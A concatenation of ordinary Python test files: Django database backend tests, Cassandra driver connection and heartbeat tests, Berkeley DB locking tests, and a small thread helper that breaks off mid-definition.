cursor.execute(query2)
self.assertEqual(cursor.fetchone(), ('Clark', 'Kent'))
self.assertEqual(list(cursor.fetchmany(2)), [('Jane', 'Doe'), ('John', 'Doe')])
self.assertEqual(list(cursor.fetchall()), [('Mary', 'Agnelline'), ('Peter', 'Parker')])
def test_unicode_password(self):
old_password = connection.settings_dict['PASSWORD']
connection.settings_dict['PASSWORD'] = "françois"
try:
connection.cursor()
except DatabaseError:
# As password is probably wrong, a database exception is expected
pass
except Exception as e:
self.fail("Unexpected error raised with unicode password: %s" % e)
finally:
connection.settings_dict['PASSWORD'] = old_password
def test_database_operations_helper_class(self):
# Ticket #13630
self.assertTrue(hasattr(connection, 'ops'))
self.assertTrue(hasattr(connection.ops, 'connection'))
self.assertEqual(connection, connection.ops.connection)
def test_database_operations_init(self):
"""
Test that DatabaseOperations initialization doesn't query the database.
See #17656.
"""
with self.assertNumQueries(0):
connection.ops.__class__(connection)
def test_cached_db_features(self):
self.assertIn(connection.features.supports_transactions, (True, False))
self.assertIn(connection.features.supports_stddev, (True, False))
self.assertIn(connection.features.can_introspect_foreign_keys, (True, False))
def test_duplicate_table_error(self):
""" Test that creating an existing table returns a DatabaseError """
cursor = connection.cursor()
query = 'CREATE TABLE %s (id INTEGER);' % models.Article._meta.db_table
with self.assertRaises(DatabaseError):
cursor.execute(query)
def test_cursor_contextmanager(self):
"""
Test that cursors can be used as a context manager
"""
with connection.cursor() as cursor:
self.assertIsInstance(cursor, CursorWrapper)
# Both InterfaceError and ProgrammingError seem to be used when
# accessing closed cursor (psycopg2 has InterfaceError, rest seem
# to use ProgrammingError).
with self.assertRaises(connection.features.closed_cursor_error_class):
# cursor should be closed, so no queries should be possible.
cursor.execute("SELECT 1" + connection.features.bare_select_suffix)
@unittest.skipUnless(connection.vendor == 'postgresql',
"Psycopg2 specific cursor.closed attribute needed")
def test_cursor_contextmanager_closing(self):
# There isn't a generic way to test that cursors are closed, but
# psycopg2 offers us a way to check that by closed attribute.
# So, run only on psycopg2 for that reason.
with connection.cursor() as cursor:
self.assertIsInstance(cursor, CursorWrapper)
self.assertTrue(cursor.closed)
# Unfortunately with sqlite3 the in-memory test database cannot be closed.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_is_usable_after_database_disconnects(self):
"""
Test that is_usable() doesn't crash when the database disconnects.
Regression for #21553.
"""
# Open a connection to the database.
with connection.cursor():
pass
# Emulate a connection close by the database.
connection._close()
# Even then is_usable() should not raise an exception.
try:
self.assertFalse(connection.is_usable())
finally:
# Clean up the mess created by connection._close(). Since the
# connection is already closed, this crashes on some backends.
try:
connection.close()
except Exception:
pass
@override_settings(DEBUG=True)
def test_queries(self):
"""
Test the documented API of connection.queries.
"""
with connection.cursor() as cursor:
reset_queries()
cursor.execute("SELECT 1" + connection.features.bare_select_suffix)
self.assertEqual(1, len(connection.queries))
self.assertIsInstance(connection.queries, list)
self.assertIsInstance(connection.queries[0], dict)
six.assertCountEqual(self, connection.queries[0].keys(), ['sql', 'time'])
reset_queries()
self.assertEqual(0, len(connection.queries))
# Unfortunately with sqlite3 the in-memory test database cannot be closed.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
@override_settings(DEBUG=True)
def test_queries_limit(self):
"""
Test that the backend doesn't store an unlimited number of queries.
Regression for #12581.
"""
old_queries_limit = BaseDatabaseWrapper.queries_limit
BaseDatabaseWrapper.queries_limit = 3
new_connection = connection.copy()
# Initialize the connection and clear initialization statements.
with new_connection.cursor():
pass
new_connection.queries_log.clear()
try:
with new_connection.cursor() as cursor:
cursor.execute("SELECT 1" + new_connection.features.bare_select_suffix)
cursor.execute("SELECT 2" + new_connection.features.bare_select_suffix)
with warnings.catch_warnings(record=True) as w:
self.assertEqual(2, len(new_connection.queries))
self.assertEqual(0, len(w))
with new_connection.cursor() as cursor:
cursor.execute("SELECT 3" + new_connection.features.bare_select_suffix)
cursor.execute("SELECT 4" + new_connection.features.bare_select_suffix)
with warnings.catch_warnings(record=True) as w:
self.assertEqual(3, len(new_connection.queries))
self.assertEqual(1, len(w))
self.assertEqual(str(w[0].message), "Limit for query logging "
"exceeded, only the last 3 queries will be returned.")
finally:
BaseDatabaseWrapper.queries_limit = old_queries_limit
new_connection.close()
# We don't make these tests conditional because that means we would need to
# check and differentiate between:
# * MySQL+InnoDB, MySQL+MYISAM (something we currently can't do).
# * if sqlite3 (if/once we get #14204 fixed) has referential integrity turned
# on or not, something that would be controlled by runtime support and user
# preference.
# We just verify that the exception raised is django.db.IntegrityError.
class FkConstraintsTests(TransactionTestCase):
available_apps = ['backends']
def setUp(self):
# Create a Reporter.
self.r = models.Reporter.objects.create(first_name='John', last_name='Smith')
def test_integrity_checks_on_creation(self):
"""
Try to create a model instance that violates a FK constraint. If it
fails it should fail with IntegrityError.
"""
a1 = models.Article(headline="This is a test", pub_date=datetime.datetime(2005, 7, 27), reporter_id=30)
try:
a1.save()
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
# Now that we know this backend supports integrity checks we make sure
# constraints are also enforced for proxy models. Refs #17519
a2 = models.Article(headline='This is another test', reporter=self.r,
pub_date=datetime.datetime(2012, 8, 3),
reporter_proxy_id=30)
self.assertRaises(IntegrityError, a2.save)
def test_integrity_checks_on_update(self):
"""
Try to update a model instance introducing a FK constraint violation.
If it fails it should fail with IntegrityError.
"""
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a1 = models.Article.objects.get(headline="Test article")
a1.reporter_id = 30
try:
a1.save()
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
# Now that we know this backend supports integrity checks we make sure
# constraints are also enforced for proxy models. Refs #17519
# Create another article
r_proxy = models.ReporterProxy.objects.get(pk=self.r.pk)
models.Article.objects.create(headline='Another article',
pub_date=datetime.datetime(1988, 5, 15),
reporter=self.r, reporter_proxy=r_proxy)
# Retrieve the second article from the DB
a2 = models.Article.objects.get(headline='Another article')
a2.reporter_proxy_id = 30
self.assertRaises(IntegrityError, a2.save)
def test_disable_constraint_checks_manually(self):
"""
When constraint checks are disabled, should be able to write bad data
without IntegrityErrors.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(
headline="Test article",
pub_date=datetime.datetime(2010, 9, 4),
reporter=self.r,
)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
connection.disable_constraint_checking()
a.save()
connection.enable_constraint_checking()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
transaction.set_rollback(True)
def test_disable_constraint_checks_context_manager(self):
"""
When constraint checks are disabled (using context manager), should be
able to write bad data without IntegrityErrors.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(
headline="Test article",
pub_date=datetime.datetime(2010, 9, 4),
reporter=self.r,
)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
with connection.constraint_checks_disabled():
a.save()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
transaction.set_rollback(True)
def test_check_constraints(self):
"""
Constraint checks should raise an IntegrityError when bad data is in the DB.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(
headline="Test article",
pub_date=datetime.datetime(2010, 9, 4),
reporter=self.r,
)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
with connection.constraint_checks_disabled():
a.save()
with self.assertRaises(IntegrityError):
connection.check_constraints()
transaction.set_rollback(True)
class ThreadTests(TransactionTestCase):
available_apps = ['backends']
def test_default_connection_thread_local(self):
"""
Ensure that the default connection (i.e. django.db.connection) is
different for each thread.
Refs #17258.
"""
# Map connections by id because connections with identical aliases
# have the same hash.
connections_dict = {}
connection.cursor()
connections_dict[id(connection)] = connection
def runner():
# Passing django.db.connection between threads doesn't work while
# connections[DEFAULT_DB_ALIAS] does.
from django.db import connections
connection = connections[DEFAULT_DB_ALIAS]
# Allow thread sharing so the connection can be closed by the
# main thread.
connection.allow_thread_sharing = True
connection.cursor()
connections_dict[id(connection)] = connection
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
# Check that each created connection got different inner connection.
self.assertEqual(
len(set(conn.connection for conn in connections_dict.values())),
3)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_dict.values():
if conn is not connection:
conn.close()
def test_connections_thread_local(self):
"""
Ensure that the connections are different for each thread.
Refs #17258.
"""
# Map connections by id because connections with identical aliases
# have the same hash.
connections_dict = {}
for conn in connections.all():
connections_dict[id(conn)] = conn
def runner():
from django.db import connections
for conn in connections.all():
# Allow thread sharing so the connection can be closed by the
# main thread.
conn.allow_thread_sharing = True
connections_dict[id(conn)] = conn
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertEqual(len(connections_dict), 6)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_dict.values():
if conn is not connection:
conn.close()
def test_pass_connection_between_threads(self):
"""
Ensure that a connection can be passed from one thread to the other.
Refs #17258.
"""
models.Person.objects.create(first_name="John", last_name="Doe")
def do_thread():
def runner(main_thread_connection):
from django.db import connections
connections['default'] = main_thread_connection
try:
models.Person.objects.get(first_name="John", last_name="Doe")
except Exception as e:
exceptions.append(e)
t = threading.Thread(target=runner, args=[connections['default']])
t.start()
t.join()
# Without touching allow_thread_sharing, which should be False by default.
exceptions = []
do_thread()
# Forbidden!
self.assertIsInstance(exceptions[0], DatabaseError)
# If explicitly setting allow_thread_sharing to False
connections['default'].allow_thread_sharing = False
exceptions = []
do_thread()
# Forbidden!
self.assertIsInstance(exceptions[0], DatabaseError)
# If explicitly setting allow_thread_sharing to True
connections['default'].allow_thread_sharing = True
exceptions = []
do_thread()
# All good
self.assertEqual(exceptions, [])
def test_closing_non_shared_connections(self):
"""
Ensure that a connection that is not explicitly shareable cannot be
closed by another thread.
Refs #17258.
"""
# First, without explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# The exception was raised
self.assertEqual(len(exceptions), 1)
# Then, with explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
# Enable thread sharing
connections['default'].allow_thread_sharing = True
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# No exception was raised
self.assertEqual(len(exceptions), 0)
class MySQLPKZeroTests(TestCase):
"""
    Zero as id for AutoField should raise an exception in MySQL, because MySQL
    does not allow zero as an autoincrement primary key.
"""
@skipIfDBFeature('allows_auto_pk_0')
def test_zero_as_autoval(self):
with self.assertRaises(ValueError):
models.Square.objects.create(id=0, root=0, square=1)
class DBConstraintTestCase(TestCase):
def test_can_reference_existent(self):
obj = models.Object.objects.create()
ref = models.ObjectReference.objects.create(obj=obj)
self.assertEqual(ref.obj, obj)
ref = models.ObjectReference.objects.get(obj=obj)
self.assertEqual(ref.obj, obj)
def test_can_reference_non_existent(self):
self.assertFalse(models.Object.objects.filter(id=12345).exists())
ref = models.ObjectReference.objects.create(obj_id=12345)
ref_new = models.ObjectReference.objects.get(obj_id=12345)
self.assertEqual(ref, ref_new)
with self.assertRaises(models.Object.DoesNotExist):
ref.obj
def test_many_to_many(self):
obj = models.Object.objects.create()
obj.related_objects.create()
self.assertEqual(models.Object.objects.count(), 2)
self.assertEqual(obj.related_objects.count(), 1)
intermediary_model = models.Object._meta.get_field("related_objects").remote_field.through
intermediary_model.objects.create(from_object_id=obj.id, to_object_id=12345)
self.assertEqual(obj.related_objects.count(), 1)
self.assertEqual(intermediary_model.objects.count(), 2)
class BackendUtilTests(SimpleTestCase):
def test_format_number(self):
"""
Test the format_number converter utility
"""
def equal(value, max_d, places, result):
self.assertEqual(format_number(Decimal(value), max_d, places), result)
equal('0', 12, 3,
'0.000')
equal('0', 12, 8,
'0.00000000')
equal('1', 12, 9,
'1.000000000')
equal('0.00000000', 12, 8,
'0.00000000')
equal('0.000000004', 12, 8,
'0.00000000')
equal('0.000000008', 12, 8,
'0.00000001')
equal('0.000000000000000000999', 10, 8,
'0.00000000')
equal('0.1234567890', 12, 10,
'0.1234567890')
equal('0.1234567890', 12, 9,
'0.123456789')
equal('0.1234567890', 12, 8,
'0.12345679')
equal('0.1234567890', 12, 5,
'0.12346')
equal('0.1234567890', 12, 3,
'0.123')
equal('0.1234567890', 12, 1,
'0.1')
equal('0.1234567890', 12, 0,
'0')
equal('0.1234567890', None, 0,
'0')
equal('1234567890.1234567890', None, 0,
'1234567890')
equal('1234567890.1234567890', None, 2,
'1234567890.12')
equal('0.1234', 5, None,
'0.1234')
equal('123.12', 5, None,
'123.12')
with self.assertRaises(Rounded):
equal('0.1234567890', 5, None,
'0.12346')
with self.assertRaises(Rounded):
equal('1234567890.1234', 5, None,
'1234600000')
@unittest.skipUnless(connection.vendor == 'sqlite', 'SQLite specific test.')
@skipUnlessDBFeature('can_share_in_memory_db')
class TestSqliteThreadSharing(TransactionTestCase):
available_apps = ['backends']
def test_database_sharing_in_threads(self):
def create_object():
models.Object.objects.create()
create_object()
thread = threading.Thread(target=create_object)
thread.start()
thread.join()
self.assertEqual(models.Object.objects.count(), 2)
|
test_connection.py
|
# Copyright DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
import unittest2 as unittest
except ImportError:
import unittest # noqa
from functools import partial
from mock import patch
import logging
from six.moves import range
import sys
import threading
from threading import Thread, Event
import time
from unittest import SkipTest
from cassandra import ConsistencyLevel, OperationTimedOut
from cassandra.cluster import NoHostAvailable, ConnectionShutdown, Cluster, ExecutionProfile, EXEC_PROFILE_DEFAULT
import cassandra.io.asyncorereactor
from cassandra.io.asyncorereactor import AsyncoreConnection
from cassandra.protocol import QueryMessage
from cassandra.connection import Connection
from cassandra.policies import HostFilterPolicy, RoundRobinPolicy, HostStateListener
from cassandra.pool import HostConnectionPool
from tests import is_monkey_patched
from tests.integration import use_singledc, PROTOCOL_VERSION, get_node, CASSANDRA_IP, local, \
requiresmallclockgranularity, greaterthancass20
try:
from cassandra.io.libevreactor import LibevConnection
import cassandra.io.libevreactor
except ImportError:
LibevConnection = None
log = logging.getLogger(__name__)
def setup_module():
use_singledc()
class ConnectionTimeoutTest(unittest.TestCase):
def setUp(self):
self.cluster = Cluster(protocol_version=PROTOCOL_VERSION,
execution_profiles=
{EXEC_PROFILE_DEFAULT: ExecutionProfile(
load_balancing_policy=HostFilterPolicy(
RoundRobinPolicy(), predicate=lambda host: host.address == CASSANDRA_IP
)
)
}
)
self.session = self.cluster.connect()
def tearDown(self):
self.cluster.shutdown()
@patch('cassandra.connection.Connection.max_in_flight', 2)
def test_in_flight_timeout(self):
"""
        Test to ensure that connection id fetching will block when max_id is reached.
        In previous versions of the driver this test would cause a
        NoHostAvailable exception to be thrown when the max_id was restricted.
@since 3.3
@jira_ticket PYTHON-514
@expected_result When many requests are run on a single node connection acquisition should block
until connection is available or the request times out.
@test_category connection timeout
"""
futures = []
query = '''SELECT * FROM system.local'''
for _ in range(100):
futures.append(self.session.execute_async(query))
for future in futures:
future.result()
class TestHostListener(HostStateListener):
host_down = None
def on_down(self, host):
self.host_down = True
def on_up(self, host):
self.host_down = False
class HeartbeatTest(unittest.TestCase):
"""
    Test to validate that a failing heartbeat check marks a host as down
@since 3.3
@jira_ticket PYTHON-286
@expected_result host should be marked down when heartbeat fails. This
happens after PYTHON-734
@test_category connection heartbeat
"""
def setUp(self):
self.cluster = Cluster(protocol_version=PROTOCOL_VERSION, idle_heartbeat_interval=1)
self.session = self.cluster.connect(wait_for_all_pools=True)
def tearDown(self):
self.cluster.shutdown()
@local
@greaterthancass20
def test_heart_beat_timeout(self):
# Setup a host listener to ensure the nodes don't go down
test_listener = TestHostListener()
host = "127.0.0.1:9042"
node = get_node(1)
initial_connections = self.fetch_connections(host, self.cluster)
self.assertNotEqual(len(initial_connections), 0)
self.cluster.register_listener(test_listener)
# Pause the node
try:
node.pause()
            # Wait for connections associated with this host to go away
self.wait_for_no_connections(host, self.cluster)
            # Wait two seconds for the driver to be notified
time.sleep(2)
self.assertTrue(test_listener.host_down)
# Resume paused node
finally:
node.resume()
# Run a query to ensure connections are re-established
current_host = ""
count = 0
while current_host != host and count < 100:
rs = self.session.execute_async("SELECT * FROM system.local", trace=False)
rs.result()
current_host = str(rs._current_host)
count += 1
time.sleep(.1)
self.assertLess(count, 100, "Never connected to the first node")
new_connections = self.wait_for_connections(host, self.cluster)
self.assertFalse(test_listener.host_down)
# Make sure underlying new connections don't match previous ones
for connection in initial_connections:
self.assertFalse(connection in new_connections)
def fetch_connections(self, host, cluster):
        # Given a cluster object and a host, grab all connections associated with that host
connections = []
holders = cluster.get_connection_holders()
for conn in holders:
if host == str(getattr(conn, 'host', '')):
if isinstance(conn, HostConnectionPool):
if conn._connections is not None and len(conn._connections) > 0:
connections.append(conn._connections)
else:
if conn._connection is not None:
connections.append(conn._connection)
return connections
def wait_for_connections(self, host, cluster):
retry = 0
        while retry < 300:
            retry += 1
            connections = self.fetch_connections(host, cluster)
            if len(connections) != 0:
return connections
time.sleep(.1)
self.fail("No new connections found")
def wait_for_no_connections(self, host, cluster):
retry = 0
        while retry < 100:
            retry += 1
            connections = self.fetch_connections(host, cluster)
            if len(connections) == 0:
return
time.sleep(.5)
self.fail("Connections never cleared")
class ConnectionTests(object):
klass = None
def setUp(self):
self.klass.initialize_reactor()
def get_connection(self, timeout=5):
"""
Helper method to solve automated testing issues within Jenkins.
Officially patched under the 2.0 branch through
17998ef72a2fe2e67d27dd602b6ced33a58ad8ef, but left as is for the
1.0 branch due to possible regressions for fixing an
automated testing edge-case.
"""
conn = None
e = None
for i in range(5):
try:
contact_point = CASSANDRA_IP
conn = self.klass.factory(endpoint=contact_point, timeout=timeout, protocol_version=PROTOCOL_VERSION)
break
except (OperationTimedOut, NoHostAvailable, ConnectionShutdown) as e:
continue
if conn:
return conn
else:
raise e
def test_single_connection(self):
"""
Test a single connection with sequential requests.
"""
conn = self.get_connection()
query = "SELECT keyspace_name FROM system.schema_keyspaces LIMIT 1"
event = Event()
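        # The callback re-sends the query until ten responses have been received, then closes the connection and signals completion.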
def cb(count, *args, **kwargs):
count += 1
if count >= 10:
conn.close()
event.set()
else:
conn.send_msg(
QueryMessage(query=query, consistency_level=ConsistencyLevel.ONE),
request_id=0,
cb=partial(cb, count))
conn.send_msg(
QueryMessage(query=query, consistency_level=ConsistencyLevel.ONE),
request_id=0,
cb=partial(cb, 0))
event.wait()
def test_single_connection_pipelined_requests(self):
"""
Test a single connection with pipelined requests.
"""
conn = self.get_connection()
query = "SELECT keyspace_name FROM system.schema_keyspaces LIMIT 1"
responses = [False] * 100
event = Event()
def cb(response_list, request_num, *args, **kwargs):
response_list[request_num] = True
if all(response_list):
conn.close()
event.set()
for i in range(100):
conn.send_msg(
QueryMessage(query=query, consistency_level=ConsistencyLevel.ONE),
request_id=i,
cb=partial(cb, responses, i))
event.wait()
def test_multiple_connections(self):
"""
Test multiple connections with pipelined requests.
"""
conns = [self.get_connection() for i in range(5)]
events = [Event() for i in range(5)]
query = "SELECT keyspace_name FROM system.schema_keyspaces LIMIT 1"
def cb(event, conn, count, *args, **kwargs):
count += 1
if count >= 10:
conn.close()
event.set()
else:
conn.send_msg(
QueryMessage(query=query, consistency_level=ConsistencyLevel.ONE),
request_id=count,
cb=partial(cb, event, conn, count))
for event, conn in zip(events, conns):
conn.send_msg(
QueryMessage(query=query, consistency_level=ConsistencyLevel.ONE),
request_id=0,
cb=partial(cb, event, conn, 0))
for event in events:
event.wait()
def test_multiple_threads_shared_connection(self):
"""
Test sharing a single connections across multiple threads,
which will result in pipelined requests.
"""
num_requests_per_conn = 25
num_threads = 5
event = Event()
conn = self.get_connection()
query = "SELECT keyspace_name FROM system.schema_keyspaces LIMIT 1"
def cb(all_responses, thread_responses, request_num, *args, **kwargs):
thread_responses[request_num] = True
if all(map(all, all_responses)):
conn.close()
event.set()
def send_msgs(all_responses, thread_responses):
for i in range(num_requests_per_conn):
qmsg = QueryMessage(query=query, consistency_level=ConsistencyLevel.ONE)
with conn.lock:
request_id = conn.get_request_id()
conn.send_msg(qmsg, request_id, cb=partial(cb, all_responses, thread_responses, i))
all_responses = []
threads = []
for i in range(num_threads):
thread_responses = [False] * num_requests_per_conn
all_responses.append(thread_responses)
t = Thread(target=send_msgs, args=(all_responses, thread_responses))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
event.wait()
def test_multiple_threads_multiple_connections(self):
"""
Test several threads, each with their own Connection and pipelined
requests.
"""
num_requests_per_conn = 25
num_conns = 5
events = [Event() for i in range(5)]
query = "SELECT keyspace_name FROM system.schema_keyspaces LIMIT 1"
def cb(conn, event, thread_responses, request_num, *args, **kwargs):
thread_responses[request_num] = True
if all(thread_responses):
conn.close()
event.set()
def send_msgs(conn, event):
thread_responses = [False] * num_requests_per_conn
for i in range(num_requests_per_conn):
qmsg = QueryMessage(query=query, consistency_level=ConsistencyLevel.ONE)
with conn.lock:
request_id = conn.get_request_id()
conn.send_msg(qmsg, request_id, cb=partial(cb, conn, event, thread_responses, i))
event.wait()
threads = []
for i in range(num_conns):
conn = self.get_connection()
t = Thread(target=send_msgs, args=(conn, events[i]))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
@requiresmallclockgranularity
def test_connect_timeout(self):
        # Underlying socket implementations don't always throw a socket timeout, even with a min-float timeout.
        # This can be timing sensitive, so retry to ensure the failure is observed when it can occur.
max_retry_count = 10
exception_thrown = False
for i in range(max_retry_count):
start = time.time()
try:
conn = self.get_connection(timeout=sys.float_info.min)
conn.close()
except Exception as e:
end = time.time()
self.assertAlmostEqual(start, end, 1)
exception_thrown = True
break
self.assertTrue(exception_thrown)
def test_subclasses_share_loop(self):
if self.klass not in (AsyncoreConnection, LibevConnection):
raise SkipTest
class C1(self.klass):
pass
class C2(self.klass):
pass
clusterC1 = Cluster(connection_class=C1)
clusterC1.connect(wait_for_all_pools=True)
clusterC2 = Cluster(connection_class=C2)
clusterC2.connect(wait_for_all_pools=True)
self.addCleanup(clusterC1.shutdown)
self.addCleanup(clusterC2.shutdown)
self.assertEqual(len(get_eventloop_threads(self.event_loop_name)), 1)
def get_eventloop_threads(name):
all_threads = list(threading.enumerate())
log.debug('all threads: {}'.format(all_threads))
log.debug('all names: {}'.format([thread.name for thread in all_threads]))
event_loops_threads = [thread for thread in all_threads if name == thread.name]
return event_loops_threads
class AsyncoreConnectionTests(ConnectionTests, unittest.TestCase):
klass = AsyncoreConnection
event_loop_name = "asyncore_cassandra_driver_event_loop"
def setUp(self):
if is_monkey_patched():
raise unittest.SkipTest("Can't test asyncore with monkey patching")
ConnectionTests.setUp(self)
def clean_global_loop(self):
cassandra.io.asyncorereactor._global_loop._cleanup()
cassandra.io.asyncorereactor._global_loop = None
class LibevConnectionTests(ConnectionTests, unittest.TestCase):
klass = LibevConnection
event_loop_name = "event_loop"
def setUp(self):
if is_monkey_patched():
raise unittest.SkipTest("Can't test libev with monkey patching")
if LibevConnection is None:
raise unittest.SkipTest(
'libev does not appear to be installed properly')
ConnectionTests.setUp(self)
def clean_global_loop(self):
cassandra.io.libevreactor._global_loop._cleanup()
cassandra.io.libevreactor._global_loop = None
|
test_lock.py
|
"""
TestCases for testing the locking sub-system.
"""
import time
import unittest
from .test_all import db, test_support, verbose, have_threads, \
get_new_environment_path, get_new_database_path
if have_threads :
from threading import Thread
import sys
if sys.version_info[0] < 3 :
from threading import currentThread
else :
from threading import current_thread as currentThread
#----------------------------------------------------------------------
class LockingTestCase(unittest.TestCase):
import sys
if sys.version_info[:3] < (2, 4, 0):
def assertTrue(self, expr, msg=None):
self.failUnless(expr,msg=msg)
def setUp(self):
self.homeDir = get_new_environment_path()
self.env = db.DBEnv()
self.env.open(self.homeDir, db.DB_THREAD | db.DB_INIT_MPOOL |
db.DB_INIT_LOCK | db.DB_CREATE)
def tearDown(self):
self.env.close()
test_support.rmtree(self.homeDir)
def test01_simple(self):
if verbose:
print('\n', '-=' * 30)
print("Running %s.test01_simple..." % self.__class__.__name__)
anID = self.env.lock_id()
if verbose:
print("locker ID: %s" % anID)
lock = self.env.lock_get(anID, "some locked thing", db.DB_LOCK_WRITE)
if verbose:
print("Aquired lock: %s" % lock)
self.env.lock_put(lock)
if verbose:
print("Released lock: %s" % lock)
self.env.lock_id_free(anID)
def test02_threaded(self):
if verbose:
print('\n', '-=' * 30)
print("Running %s.test02_threaded..." % self.__class__.__name__)
threads = []
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_READ,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_READ,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_READ,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_READ,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
for t in threads:
import sys
if sys.version_info[0] < 3 :
t.setDaemon(True)
else :
t.daemon = True
t.start()
for t in threads:
t.join()
if db.version() >= (4, 2) :
def test03_lock_timeout(self):
self.env.set_timeout(0, db.DB_SET_LOCK_TIMEOUT)
self.assertEqual(self.env.get_timeout(db.DB_SET_LOCK_TIMEOUT), 0)
self.env.set_timeout(0, db.DB_SET_TXN_TIMEOUT)
self.assertEqual(self.env.get_timeout(db.DB_SET_TXN_TIMEOUT), 0)
self.env.set_timeout(123456, db.DB_SET_LOCK_TIMEOUT)
self.assertEqual(self.env.get_timeout(db.DB_SET_LOCK_TIMEOUT), 123456)
self.env.set_timeout(7890123, db.DB_SET_TXN_TIMEOUT)
self.assertEqual(self.env.get_timeout(db.DB_SET_TXN_TIMEOUT), 7890123)
def test04_lock_timeout2(self):
self.env.set_timeout(0, db.DB_SET_LOCK_TIMEOUT)
self.env.set_timeout(0, db.DB_SET_TXN_TIMEOUT)
self.env.set_timeout(123456, db.DB_SET_LOCK_TIMEOUT)
self.env.set_timeout(7890123, db.DB_SET_TXN_TIMEOUT)
def deadlock_detection() :
while not deadlock_detection.end :
deadlock_detection.count = \
self.env.lock_detect(db.DB_LOCK_EXPIRE)
if deadlock_detection.count :
while not deadlock_detection.end :
pass
break
time.sleep(0.01)
deadlock_detection.end=False
deadlock_detection.count=0
t=Thread(target=deadlock_detection)
import sys
if sys.version_info[0] < 3 :
t.setDaemon(True)
else :
t.daemon = True
t.start()
self.env.set_timeout(100000, db.DB_SET_LOCK_TIMEOUT)
anID = self.env.lock_id()
anID2 = self.env.lock_id()
self.assertNotEqual(anID, anID2)
lock = self.env.lock_get(anID, "shared lock", db.DB_LOCK_WRITE)
start_time=time.time()
self.assertRaises(db.DBLockNotGrantedError,
self.env.lock_get,anID2, "shared lock", db.DB_LOCK_READ)
end_time=time.time()
deadlock_detection.end=True
self.assertTrue((end_time-start_time) >= 0.1)
self.env.lock_put(lock)
t.join()
self.env.lock_id_free(anID)
self.env.lock_id_free(anID2)
if db.version() >= (4,6):
self.assertTrue(deadlock_detection.count>0)
def theThread(self, lockType):
import sys
if sys.version_info[0] < 3 :
name = currentThread().getName()
else :
name = currentThread().name
if lockType == db.DB_LOCK_WRITE:
lt = "write"
else:
lt = "read"
anID = self.env.lock_id()
if verbose:
print("%s: locker ID: %s" % (name, anID))
for i in range(1000) :
lock = self.env.lock_get(anID, "some locked thing", lockType)
if verbose:
print("%s: Aquired %s lock: %s" % (name, lt, lock))
self.env.lock_put(lock)
if verbose:
print("%s: Released %s lock: %s" % (name, lt, lock))
self.env.lock_id_free(anID)
#----------------------------------------------------------------------
def test_suite():
suite = unittest.TestSuite()
if have_threads:
suite.addTest(unittest.makeSuite(LockingTestCase))
else:
suite.addTest(unittest.makeSuite(LockingTestCase, 'test01'))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
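# A minimal, hedged sketch of the lock pattern these tests exercise (the calls
# mirror setUp/test01_simple above; the environment path is illustrative):
#
#     env = db.DBEnv()
#     env.open(homeDir, db.DB_THREAD | db.DB_INIT_MPOOL | db.DB_INIT_LOCK | db.DB_CREATE)
#     locker = env.lock_id()
#     lock = env.lock_get(locker, "some locked thing", db.DB_LOCK_WRITE)
#     env.lock_put(lock)
#     env.lock_id_free(locker)
#     env.close()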
|
thread.py
|
__author__ = 'tinglev@kth.se'
from threading import Thread, Event, current_thread
import threading
class SyncThread(Thread):
    """Worker thread that can be asked to stop via an internal Event."""
    def __init__(self, target):
        super(SyncThread, self).__init__(target=target, name='SyncThread')
        self._stop_event = Event()
    def stop(self):
        """Signal the target routine that it should stop."""
        self._stop_event.set()
    def stopped(self):
        """Return True once stop() has been called."""
        return self._stop_event.is_set()
def thread_is_stoppped():
if current_thread().name == 'SyncThread':
this_thread = current_thread()
return this_thread.stopped()
return False
def get_sync_thread():
